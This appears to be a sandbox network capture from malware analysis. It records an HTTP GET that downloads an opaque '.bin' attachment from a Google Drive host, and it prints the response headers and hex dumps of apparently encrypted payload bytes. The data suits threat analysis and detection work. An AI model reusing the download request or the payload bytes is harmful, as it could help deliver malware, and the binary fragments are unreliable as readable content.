                            2021-12-01 10:57:38 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Cache-Control: no-cache
                            Host: doc-00-50-docs.googleusercontent.com
                            Connection: Keep-Alive
                            2021-12-01 10:57:38 UTC2INHTTP/1.1 200 OK
                            X-GUploader-UploadID: ADPycdsOdseX3DzRWTiMz7pvvs2DsaKqt7dq4YExMGDT9FtuVBpnfdjfWDppYWQJhqS1hF6QvVbpI0_veIo29WVepCCRKNcoaA
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Credentials: false
                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                            Access-Control-Allow-Methods: GET,OPTIONS
                            Content-Type: application/octet-stream
                            Content-Disposition: attachment;filename="Kelly_EsVTDBwyFh235.bin";filename*=UTF-8''Kelly_EsVTDBwyFh235.bin
                            Content-Length: 106560
                            Date: Wed, 01 Dec 2021 10:57:38 GMT
                            Expires: Wed, 01 Dec 2021 10:57:38 GMT
                            Cache-Control: private, max-age=0
                            X-Goog-Hash: crc32c=3XouAQ==
                            Server: UploadServer
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                            Connection: close
                            2021-12-01 10:57:38 UTC6INData Raw: c5 47 e7 48 0a b2 d4 dd c5 af be 08 f9 7a 52 de 2c 52 f3 3f 91 53 36 59 6b b0 82 e4 2a 95 19 04 c9 c0 e7 86 ba cb 58 86 0f 85 b3 55 91 68 74 24 88 0b 08 20 74 7f 6c b4 80 19 59 75 0c 85 9a 24 a7 cf 77 21 96 96 7d f3 ab 89 67 21 2c e1 cc d2 35 82 ce b2 33 36 9d 6b 13 04 7d de 85 a4 10 5b d1 a3 c8 90 2d 90 eb d4 2a 85 ea 18 fb 28 38 96 6c bc 25 21 37 a3 f2 ce f8 3f 8f e6 95 65 d9 79 57 cc 28 76 0d 95 8d 24 c4 8d 83 d0 62 4e 99 35 2a 45 f4 13 fc 7d ee 14 38 d1 73 4b a2 e7 0c 34 5d f3 57 45 83 e7 dd 1b b7 1d 2a 11 b3 0a 68 6a 62 e2 60 9c eb b6 25 55 2f a7 9b 85 a0 3d 00 0f 74 a8 e6 b6 66 0f f6 64 59 74 f7 e0 9c 90 51 68 42 b0 60 57 49 e6 44 5d bb 25 4c 74 4b 2c 84 55 b8 cb be 50 e4 d8 66 bd b9 1b 52 57 16 37 fa 89 d1 31 4a 53 6b 2e 0d 18 64 8e 1c 40 ed e1 b8
                            Data Ascii: GHzR,R?S6Yk*XUht$ tlYu$w!}g!,536k}[-*(8l%!7?eyW(v$bN5*E}8sK4]WE*hjb`%U/=tfdYtQhB`WID]%LtK,UPfRW71JSk.d@
                            2021-12-01 10:57:39 UTC9INData Raw: 3f b7 9e ca 0b 37 e8 32 a1 1f 18 a5 02 a9 00 a2 0e 67 3f 01 15 79 ad 4f 3a d5 26 e3 e4 9f db b0 d1 84 89 5a 65 91 4f 9f a3 b5 b2 58 23 6c 67 f9 83 92 fa a4 94 67 8b 37 3d 4d c2 56 0d b1 d3 43 77 26 cb 1e 9c 81 e8 e7 91 81 d9 c9 c6 0e 96 70 f8 30 a8 12 31 0c 88 fb e4 ab f2 a3 b7 31 68 cb 63 9e 92 2c 4e 46 47 91 11 dc 9b 1a 92 27 66 95 df 31 e6 50 b1 5b 94 d7 1b 8e e0 c6 06 4c d4 17 cf a5 94 0a 3c c2 e2 bb 3e c4 82 c0 cf 65 48 0c da cc 1e 5e 80 46 d3 34 b7 7b 38 8b 99 07 09 74 6c 1e fa a2 0a ca 5e d0 56 2d ea b0 ec dc 9f 65 0b 51 7f d7 fa b9 50 44 f7 73 59 9b 50 7c 60 7e 11 9b 7c 9f 58 7f a3 5d 05 75 2f 49 d6 60 87 b1 2b 5f d6 8e df 9c c8 d6 2f 7e d3 45 a8 dc ce 71 d6 85 44 e2 2d 6f b7 ed 9c 30 b2 7e 93 82 70 6f 50 1f 64 23 53 03 b6 90 50 50 67 ea 6b 87 1c
                            Data Ascii: ?72g?yO:&ZeOX#lgg7=MVCw&p011hc,NFG'f1P[L<>eH^F4{8tl^V-eQPDsYP|`~|X]u/I`+_/~EqD-o0~poPd#SPPgk
                            2021-12-01 10:57:39 UTC13INData Raw: c5 3f 3d b7 a0 1a 82 c3 33 84 ae 66 dc 5f 6b a8 5b 8d 35 88 d7 12 90 46 b5 9b 54 83 03 35 a2 b0 7d 35 fb e6 f5 b6 51 04 48 d1 d2 47 75 fc f0 b0 22 b8 94 54 d2 16 12 ba ae b8 f0 40 c6 e1 15 6e c6 dd f7 75 74 5b 5d 2b 8a 15 79 f3 05 0e 10 d7 ea 2e bd 30 29 aa 4c 3f 05 74 98 73 67 92 a9 ab bc b1 48 69 78 a7 aa 95 8a 53 44 f2 aa 8f 57 b3 9a 17 2a ac ad b3 c9 0b bc 89 a6 f7 11 3f a6 cf 42 48 97 85 61 6b de 98 71 f0 94 7b 04 90 ed 88 6f 10 8f d9 07 4c 79 eb 95 e7 21 7c 32 80 0c 50 0a a3 29 b2 9d 04 2d 4e 01 0a ba 18 4a b9 47 da 78 59 c2 e4 67 dc 3b 5a d7 ec b4 a6 dc cf fc 95 35 60 59 fb 01 f8 13 9a b3 a1 e1 37 a3 f2 4d 10 3e 0a 2f 6a e1 6a 79 59 d3 65 be 0e 21 84 e9 91 26 b0 9a e9 d4 32 5d 43 36 f5 a0 4f fa 81 55 5d 23 1a 5d 26 00 a8 d8 cb d4 f4 c9 a0 e1 dd 46
                            Data Ascii: ?=3f_k[5FT5}5QHGu"T@nut[]+y.0)L?tsgHixSDW*?BHakq{oLy!|2P)-NJGxYg;Z5`Y7M>/jjyYe!&2]C6OU]#]&F
                            2021-12-01 10:57:39 UTC17INData Raw: d1 3f 1c 71 f7 a1 8a a4 cc 78 62 21 63 f5 40 22 44 8e 2d d3 72 cc 3e f7 a8 df fd 16 74 e5 65 51 9b d4 c2 a7 cf 1f a2 f4 0a 23 52 30 83 ec e4 e2 40 fa 56 96 01 c1 34 ed ba 61 f0 4f 51 71 f4 95 72 d5 8f 03 4b 10 d6 f4 b1 bd 7f d8 3e e5 2f 87 1d 51 20 86 d3 31 7e 70 1f 7b b2 7e 84 33 a5 de 01 93 63 e9 d6 f3 ec 7c ab 52 ff ea 89 71 b6 fa 8a 78 e3 55 e6 28 de 80 1b 2b 3b 24 c0 4f 2a 84 8f c1 1a b9 1b 9c 70 cc 6b 06 d7 2b 7e 39 a8 bb 3a 92 6f 27 5a 2d 27 bb ac d4 c4 93 8e d1 6c d4 75 bb c5 0a 19 13 c8 54 ea db 85 5c 41 7d 80 ad 20 be 87 58 cf c8 b9 2c 27 04 55 7f 32 2c bd 82 70 32 8d 68 c8 ac 0a 91 2c 0d f7 f0 eb 87 7b 55 79 0d bd 00 69 aa 80 b8 ea e7 99 02 fa 78 78 f3 43 42 e4 df 5e 1b 0f 24 2f 52 10 98 c5 6a a9 89 b2 56 82 71 52 b6 d8 c2 18 79 b6 38 5a a1 45
                            Data Ascii: ?qxb!c@"D-r>teQ#R0@V4aOQqrK>/Q 1~p{~3c|RqxU(+;$O*pk+~9:o'Z-'luT\A} X,'U2,p2h,{UyixxCB^$/RjVqRy8ZE
                            2021-12-01 10:57:39 UTC18INData Raw: da 3a fe 8e e4 cd c6 a3 00 2e ee 8f 21 65 69 55 ee c4 75 1b db 61 f7 92 c8 16 03 92 43 25 a1 39 71 41 9d 9f 3d b3 c2 83 3f 6c 8d 42 82 0e c0 34 d7 da 56 8c b7 f6 dd 49 0e 00 29 13 66 96 3b 44 97 bc d4 76 dc 1b e9 50 be 35 7c a8 65 ae 86 11 3a 40 c9 e2 41 a1 f4 22 50 5a 93 2d 2b 11 7e be 31 36 6d 91 34 e8 80 39 22 2d fb f1 d1 a3 60 f8 c1 23 51 de f5 70 94 f6 a5 ae 42 ae 6b 63 b4 06 76 8a 07 48 da f3 0a aa 3b 3e 7a 78 51 ce 59 d1 ac c9 39 79 0a e9 7d 27 de 6a bd ad 84 79 1a fe 5d a0 95 5a 2e 41 a6 e2 e8 ee 68 a8 5e 78 10 33 52 74 de 9a d2 b9 01 91 6a 1f 7d c9 18 2a d7 bf e7 21 cc a5 a6 99 81 d7 5e 7c c7 11 48 c1 8c 82 ce 4d 46 3e f5 4f 02 45 7d 36 49 b9 10 5b 5a 53 91 c9 a8 66 e4 50 dd 85 ea 18 a8 7b 50 7c c0 48 f1 72 df 8a 06 31 07 b2 02 56 98 9a 26 28 0f
                            Data Ascii: :.!eiUuaC%9qA=?lB4VI)f;DvP5|e:@A"PZ-+~16m49"-`#QpBkcvH;>zxQY9y}'jy]Z.Ah^x3Rtj}*!^|HMF>OE}6I[ZSfP{P|Hr1V&(
                            2021-12-01 10:57:39 UTC19INData Raw: 62 fe 37 ff 75 6d 74 43 20 f0 e2 12 c9 28 e0 69 a4 72 31 e3 49 18 62 d1 e4 1e d9 60 08 4a 6d 0a 14 2b 06 6d 97 1f d7 1b 51 6c 9c d3 31 0a 40 f3 10 0e 8c 48 33 40 93 58 c4 e2 8b a0 d4 cf d6 2b 91 03 d0 b7 7e 6d 84 3a d9 97 3d f6 1b da 86 ba 04 86 7e c5 92 20 de 8f 69 05 a5 d7 1f f1 46 43 0a 62 a3 12 4f 98 bb 57 be e3 d6 5a a7 5a a3 e6 1f 3d 6c fa 50 be 1a 46 09 b5 b4 48 88 a3 c3 84 ee b6 d3 56 f2 eb e4 df e8 d1 58 cf 30 10 0e c7 a8 ab d1 8c af 2f 71 f6 57 25 e6 91 66 3c a6 e6 b0 36 e5 27 b8 43 05 11 63 c5 af a2 ac 3e 63 48 e0 37 95 2c dd b8 fc 38 b3 ec 20 8e cd b9 89 ce be f1 dd bd 1c cf 4c 48 c3 fe 95 4b 0a 33 49 9c dc 38 73 30 a1 2c 1d 92 cb 48 37 2e 14 21 76 23 2d d7 8e 02 b4 eb 78 84 4e 15 98 57 ad 76 b9 af 09 e4 a6 5e e5 26 a4 cb 97 75 41 df f0 3a 5a
                            Data Ascii: b7umtC (ir1Ib`Jm+mQl1@H3@X+~m:=~ iFCbOWZZ=lPFHVX0/qW%f<6'Cc>cH7,8 LHK3I8s0,H7.!v#-xNWv^&uA:Z
                            2021-12-01 10:57:39 UTC21INData Raw: e2 e0 2d b2 0c 75 47 93 0c 92 d9 97 a7 5d 06 5c e8 72 ae ef 9e 3f 58 cc 74 c7 2e 5b 6a 91 39 84 ff 63 2b 54 8d 3a 6d 7c d9 53 a2 77 21 1f c7 5f ad f0 a5 6a c1 88 0e 3e 33 d1 4d 30 5e 7e 08 66 e3 c1 78 17 2e 6b 50 ad c9 4d d8 de f9 b4 b7 28 3d 26 29 d8 13 5f 48 74 11 f1 f0 73 d4 1b 9e e7 4c 7e a7 90 6f 5b b8 26 67 0f ff c7 47 e9 84 dd b6 d5 28 ea 41 2e 81 62 de e0 9c 2b 1b 9a 6d 98 de e0 de 27 97 72 f7 32 d8 33 61 75 a2 b0 fb 82 b4 85 cc 8f 1e 91 a3 9f 6f 1e c6 14 a1 26 6d 64 c6 04 d7 bb 52 48 35 60 dd b4 5b 0d bb f7 69 67 e4 81 9a 26 2e b1 2f 71 87 f2 78 6f 2d b2 dd 71 7f 50 90 46 18 bf bf d7 e8 48 4b d6 38 02 37 b6 75 00 dc e9 b7 1a 13 65 70 cb 50 86 43 7e 24 ac 3d 1d ba c4 b5 7a 9d fb 8c c9 44 5d 57 f4 77 c6 46 f5 b6 ec 8e 54 49 9c 48 ee f5 b7 fa 27 1f
                            Data Ascii: -uG]\r?Xt.[j9c+T:m|Sw!_j>3M0^~fx.kPM(=&)_HtsL~o[&gG(A.b+m'r23auo&mdRH5`[ig&./qxo-qPFHK87uepPC~$=zD]WwFTIH'
                            2021-12-01 10:57:39 UTC22INData Raw: b7 4f 44 68 4f 07 30 ed 2b 20 91 c4 77 df 8e fe 83 5d 58 ab 93 bb 7b 32 47 28 d9 3d a0 b3 ee 1f 4d 7e 5a 2d 23 ac 7b f8 3b 43 80 c9 92 95 0a 24 7e eb 48 08 51 74 9e dc 85 ea 7e 2d 5a 90 c5 e3 44 f2 31 d0 be 2a 9c 96 1c 88 cf af 79 dd ce 78 3a 46 30 66 29 a2 a0 13 c9 59 43 2b 20 aa 2e 5b a5 b6 b6 03 29 b6 63 13 41 a0 d6 3a fd 04 c4 c6 e4 df 09 c7 12 2f b1 22 bb f2 af 71 57 dc a0 c3 06 d4 8e 1e 71 b0 d8 cc 1b 3e cf d4 23 22 0c c6 5f b7 6b 91 e1 5a 45 a6 ca 61 fc fd e8 84 8d 2d d6 73 5e fb 1d 88 61 ab d8 aa e6 c9 29 a9 17 41 de d4 dc 13 5e 62 b0 11 e3 f9 bc 30 0b fd 0a 78 ea 4c 0c 1f a3 c1 88 1d c7 3d e2 66 12 81 39 4d 30 05 6e df 91 af 96 f9 68 da 8a 58 90 50 6b cc cb 5c 77 23 9c 2b fe 04 9f 41 ff a5 6c 27 5b aa 8d be 1f c0 c9 fc d2 88 78 23 f4 56 4c b0 91
                            Data Ascii: ODhO0+ w]X{2G(=M~Z-#{;C$~HQt~-ZD1*yx:F0f)YC+ .[)cA:/"qWq>#"_kZEa-s^a)A^b0xL=f9M0nhXPk\w#+Al'[x#VL
                            2021-12-01 10:57:39 UTC23INData Raw: 3a 60 00 54 7e 68 14 49 e8 31 f3 d3 8c 56 74 b9 59 65 2a bb ae 9d 71 a1 0a 9f 48 90 64 23 25 13 12 8e 7d fe f5 18 35 ce c1 74 45 2a bc 4f 18 de cc a5 bd ac f4 d7 ec c4 8e dd 99 59 61 01 22 a2 60 60 62 1e 5f c3 38 2e c6 f6 55 1a 16 e6 3c c4 68 b0 bf 13 6f 7d ab 5a b7 6d d0 11 67 bc 25 a8 72 5f 7f be e8 69 67 0a bc 9a 26 f2 81 8a cb fd d6 2e 00 57 e5 35 82 cb f9 05 cd 0e ab 9e 0d 9c 71 99 72 a0 1a b0 73 a5 b6 79 ef 18 24 76 90 85 28 e0 54 23 68 01 48 61 1f 2c e2 b5 f0 e5 d4 fe c5 bb a5 19 05 61 df b6 ad 1d 50 5c 47 10 96 a0 c8 57 1f 36 82 53 11 a5 de e5 b8 3a 40 a0 d9 7f 36 3e 3d 98 64 d7 46 d9 97 68 91 f5 35 6b 2c 05 34 2d 37 64 d9 41 39 ab dc 9b bb cc a8 91 5c fe 6c 5a 42 ec 60 81 eb f6 33 a5 56 ed 3e 01 b0 a3 53 f7 5e 8f 17 f6 23 23 c4 d8 13 54 eb 84 a4
                            Data Ascii: :`T~hI1VtYe*qHd#%}5tE*OYa"``b_8.U<ho}Zmg%r_ig&.W5qrsy$v(T#hHa,aP\GW6S:@6>=dFh5k,4-7dA9\lZB`3V>S^##T
                            2021-12-01 10:57:39 UTC24INData Raw: 7f 1d f2 ba db ad 88 b3 32 ba e5 8e 7e d3 91 ff 82 69 68 96 aa 0d 36 ce 17 64 fc a2 00 24 62 dc fd 5e ff bb 03 4c 80 ec dc 99 ab 3c d8 33 5b 2d ce 45 10 0f 39 5f 65 d2 12 74 4c 61 35 c2 cb 3f 65 60 49 88 09 86 31 a1 19 3c 27 e1 ac 8d 21 c7 9a 75 8b d4 52 d2 fb d3 cd dc 41 a3 f6 ca 5c a2 05 a1 15 88 84 98 ce 83 e8 bf 70 10 35 a3 e2 4a a5 50 20 70 dc 0a d1 89 4e 81 65 aa 4d c8 0c 98 60 21 65 66 18 67 39 30 1d d1 22 87 ff bd 83 57 5e f7 eb 15 af 1e 9b af af 47 c4 8f bd f6 51 77 2c 43 4a 97 4d 57 cb 44 92 08 47 94 c7 3d 86 40 0e 94 2a 23 3c 2f 98 e5 c5 97 67 4a 65 bc b2 9a 6d ce 40 4a 20 7a 18 a0 bf 89 b0 6f 32 9f 9d c7 50 34 50 6b 61 86 07 dc b1 70 34 94 b1 f5 d8 f0 bb 65 9c 6d 75 d4 c6 cd 78 f7 09 ee bd 20 15 b3 8d b8 11 05 c3 e1 4b 2e 00 40 46 90 31 61 e9
                            Data Ascii: 2~ih6d$b^L<3[-E9_etLa5?e`I1<'!uRA\p5JP pNeM`!efg90"W^GQw,CJMWDG=@*#</gJem@J zo2P4Pkap4emux K.@F1a
                            2021-12-01 10:57:39 UTC26INData Raw: 4c 41 8b 2e 5c 4b 54 31 1b 2c 3f 23 d3 02 5c 2b d7 c7 cf 5f 7c 7a 7f 6c fe 31 9b 73 d3 dc b0 32 9a ac 71 b1 74 93 78 0d 12 4d 83 e7 6e 0f 24 0f 70 cd 5d c8 f1 23 80 81 82 48 91 80 b7 9b 79 2b 6a ad a4 d6 58 c5 79 fa 10 5e 01 f8 f9 48 0e a6 2f 3b 1c e7 2c cb 06 3a 36 6d 53 5b 58 ee 8d f6 d5 fe f2 47 9a c8 a0 8a a2 e0 c9 5a 20 62 89 08 b9 b8 b1 83 57 3c 77 87 48 a5 13 ff 16 c6 2e 18 8b 5a a9 dd f4 68 02 92 ff a8 49 01 f2 d5 df 10 97 91 26 59 9d 5c af 8d 82 48 5d bf 95 60 12 33 1b fd 0f 84 d6 1c d7 f5 f7 07 4a e8 09 f9 be 55 5f ee 94 2a 14 0d 06 eb 3b 5c 74 33 38 f0 33 da 0a 1d 14 45 f0 e7 01 72 0a 4b 7f a0 f6 b4 37 a7 3a 7f b4 36 f7 dd b8 ac de 3f 37 42 be 8c 84 84 bd 42 39 71 f3 32 8a 81 cc 27 5a 1f 9a e1 44 57 2d d7 bd 12 92 66 e0 e9 80 f3 3e 16 eb c6 b4
                            Data Ascii: LA.\KT1,?#\+_|zl1s2qtxMn$p]#Hy+jXy^H/;,:6mS[XGZ bW<wH.ZhI&Y\H]`3JU_*;\t383ErK7:6?7BB9q2'ZDW-f>
                            2021-12-01 10:57:39 UTC27INData Raw: 34 7e 21 47 cd bc c3 a5 1d b1 fc 64 5d 59 ef 67 22 a1 0a 08 b7 ab f7 ae 16 5c fc 1e f6 a4 e9 17 e1 0f 86 4f b0 77 bc 7b f4 09 5b dc 0a f2 79 43 20 8e aa bb 1c e7 b3 31 1d 45 e5 0b e1 ef 86 26 46 24 3f 38 08 ff 7a 29 5f 5a ba 81 94 60 63 8f f9 6f 35 54 1a 16 cc 72 4c d3 af 62 af 23 d5 15 a4 d0 67 c7 8d f0 ea 73 f8 f4 b3 dc 27 c0 22 b3 6a 2e ed 6a b2 22 9c b5 71 98 67 0c 2b 4e 2b a0 a1 8d e6 f1 d6 6e 57 22 d8 d0 15 65 74 c1 25 27 d2 be e1 49 95 42 13 a3 37 21 d4 e8 3f 21 8b 69 ff 2f 68 38 8d ac a9 0a b8 3e 71 6e 40 39 2d 6f a6 30 bf cd da 28 c2 40 7a fe b6 b5 26 a9 c9 bc 86 4e d8 53 52 1a 00 7e 46 67 97 d7 32 dc d0 d7 d4 83 9d f4 c0 3c e8 92 58 12 e5 08 d1 d9 48 0e 59 9f 2c 44 c9 2c 04 49 ab 7c 0a e7 e8 39 f2 37 6e c3 57 d2 11 e0 a3 86 b9 e5 5a 3e 0f 38 6f
                            Data Ascii: 4~!Gd]Yg"\Ow{[yC 1E&F$?8z)_Z`co5TrLb#gs'"j.j"qg+N+nW"et%'IB7!?!i/h8>qn@9-o0(@z&NSR~Fg2<XHY,D,I|97nWZ>8o
                            2021-12-01 10:57:39 UTC28INData Raw: 4c 24 c0 22 bb e1 72 85 34 0f f4 d6 fb 8c 39 53 8f 89 f4 58 c2 0e 67 62 5e 84 5d 38 5d 1d 65 4f 63 25 dd 8b b6 25 bc 6e 06 c5 ab d0 a7 bb c0 22 50 f0 f0 06 34 26 29 12 76 07 ca e0 7f 7e a9 78 f5 cb f0 58 f7 a9 75 a0 1b db a6 cd 0f 16 8f 51 e4 4a 6e aa 1c 29 68 c4 db 13 bb f7 97 67 f5 f7 41 76 e8 09 f3 3f b5 8d a8 bf 57 78 8f fe cc 40 66 d2 ff 73 57 e4 fc af 87 c4 31 68 ab 3d 41 de 59 2a 48 b4 27 20 0c 7e c5 b7 e3 b8 09 59 5c e7 db 75 7e e4 f8 72 01 3e 89 b5 c8 b1 b9 99 2a 74 7b d9 da 65 9d d9 19 40 6d 0d ff d3 bf e1 40 f3 60 96 01 13 9a 3f f8 c8 df ed 3f 61 cf 43 38 3b 5f b8 11 f9 e1 07 18 15 3e a9 c7 1a 5a f6 ce 4d d6 8a d3 98 b2 fa b4 c3 22 6c bf 33 d9 99 d9 14 2c 77 25 5b ce e8 17 97 02 d2 1c 21 6d 55 1e d9 97 3d f6 13 da 86 7a 5c 29 d7 6c 95 88 58 54
                            Data Ascii: L$"r49SXgb^]8]eOc%%n"P4&)v~xXuQJn)hgAv?Wx@fsW1h=AY*H' ~Y\u~r>*t{e@m@`??aC8;_>ZM"l3,w%[!mU=z\)lXT
                            2021-12-01 10:57:39 UTC29INData Raw: 48 6f af 94 2a d8 91 53 1b 89 3f d2 0d 9f 41 fd e1 97 92 db d9 2f b9 7a 3d db fd d2 fc 7f cf 0d 53 bc cb 7f f9 d7 47 e7 63 9e 86 9d 8b 30 19 a1 0f 3f a7 b4 ce d1 35 7e 64 23 6c 10 13 da 23 f7 a6 db 1c 11 ff ae f6 07 e6 94 38 4b 31 84 83 f0 11 b2 a6 c9 36 a2 d1 e0 d0 e5 75 21 ac 72 dc 67 11 71 e4 e8 26 3f 7e 66 11 f5 86 b7 7b c2 40 7a 46 3a 23 7d 74 52 53 39 e4 f9 09 49 37 a6 f4 1b 14 ce 3d 6a 1c 7c c0 64 b9 e1 cf 5f 49 47 63 f0 69 6b d2 c3 22 b6 f1 d4 a0 9e db 9f c4 31 ca 3e 83 df cb ee 70 50 34 36 23 ba f1 ae 86 b7 81 ae eb 0e 3e 85 35 74 50 6f 87 2d 2b c4 45 db b0 9b a2 3b 23 6a ed 02 f9 22 21 b4 7e fb 8f 93 e9 ad 40 aa 8f 0d e0 4c a6 a9 92 a8 ae c1 88 ac c6 a9 55 24 11 f2 0a aa 55 76 99 02 4c 39 4e 71 61 f6 f5 f2 d6 4f d9 d8 32 9f 6e 31 91 8a 25 41 8b
                            Data Ascii: Ho*S?A/z=SGc0?5~d#l#8K16u!rgq&?~f{@zF:#}tRS9I7=j|d_IGcik"1>pP46#>5tPo-+E;#j"!~@LU$UvL9NqaO2n1%A
                            2021-12-01 10:57:39 UTC31INData Raw: 75 0b cd d7 bb ef d3 4a 2c b7 0a f5 e7 33 1b 46 9b 3c 01 e3 ab 67 43 f1 db 9c 13 27 b9 1c 5f c1 de a3 e2 a4 9a a1 04 d7 27 8b f5 2b cd c0 57 5b 88 bb 4b e7 01 72 87 82 2e f3 9e ec ba cd 17 d3 a3 8b bd fa 2d c4 75 85 6d 8d be a3 5c aa 0a 40 cb 92 7c b9 2c 81 77 7b 8c de 65 9d e8 6b fb 56 c8 56 d3 36 e1 fb d7 f6 ca 7e ea 85 b4 d7 29 45 99 25 54 30 45 f2 d7 88 ab cd a7 6a cf ef c2 20 ec c6 44 d3 76 cf 19 69 75 77 4b 41 71 f3 16 03 f4 77 33 53 12 e2 c8 f5 fd c8 88 39 c1 43 66 c2 40 fd c4 0e 37 49 86 29 b0 38 07 9b 5d 7c 9d 4f 88 d2 c4 20 bb 26 ad 87 dc 18 51 36 cc bf e7 26 84 67 b0 05 88 ba 49 1a 7b f5 b0 09 a8 f1 0f 4f 63 86 cd eb 18 b4 7a 35 a3 1e 6b fd 22 6c bf 7c 98 be 49 f3 6e 24 85 48 d3 ec b7 aa 77 98 3f d2 9c 44 ea 81 05 63 74 b2 46 ba f5 50 be d9 6e
                            Data Ascii: uJ,3F<gC'_'+W[Kr.-um\@|,w{ekVV6~)E%T0Ej DviuwKAqw3S9Cf@7I)8]|O &Q6&gI{Ocz5k"l|In$Hw?DctFPn
                            2021-12-01 10:57:39 UTC32INData Raw: 6b 3a 16 92 bf 68 86 cd c3 07 e4 bc 50 b6 57 10 83 7a 62 b8 07 b0 fe ee 8e 1b 33 83 25 f9 23 e5 73 74 ee 8a 78 7f 86 b5 35 0c 9f f6 c2 04 a3 10 d4 15 1a a6 00 7f f8 14 9f d5 32 57 c6 fb dc 80 a3 eb 49 3b 57 18 3e a7 2b 86 b2 15 18 e6 04 1a 2c ec 14 14 b2 5f 40 0a dc cf 61 62 da c1 36 c3 ff ed 5e 6a 0d 29 ba fd 01 8c 3c 38 67 54 9e c8 c9 a0 d7 7e 6f 58 71 c1 f5 1c 53 2b 2e dc 77 6b 67 c9 86 36 fc c1 2b bf 21 0a 1a e9 30 9d e0 20 50 4e 48 50 d8 b8 8a 30 b6 ea 01 45 66 ae b6 59 94 e7 96 e0 e6 5e 65 87 20 61 ec 7f ac 28 41 69 c9 05 8a af 8d 46 58 d3 5a 01 5b fc 3e c4 d5 8e 4b e6 7f 62 2b 3d 70 6b 85 7d 44 8c dc e5 a1 06 50 ed 3d 67 d8 33 c9 b1 65 82 0c 24 cc 9f aa 86 e2 92 8d d6 09 2b ef f0 bd d8 9f 5c b3 71 ae 0e e1 e0 d0 d5 2b fb 59 2e 57 62 91 d2 96 21 91
                            Data Ascii: k:hPWzb3%#stx52WI;W>+,_@ab6^j)<8gT~oXqS+.wkg6+!0 PNHP0EfY^e a(AiFXZ[>Kb+=pk}DP=g3e$+\q+Y.Wb!
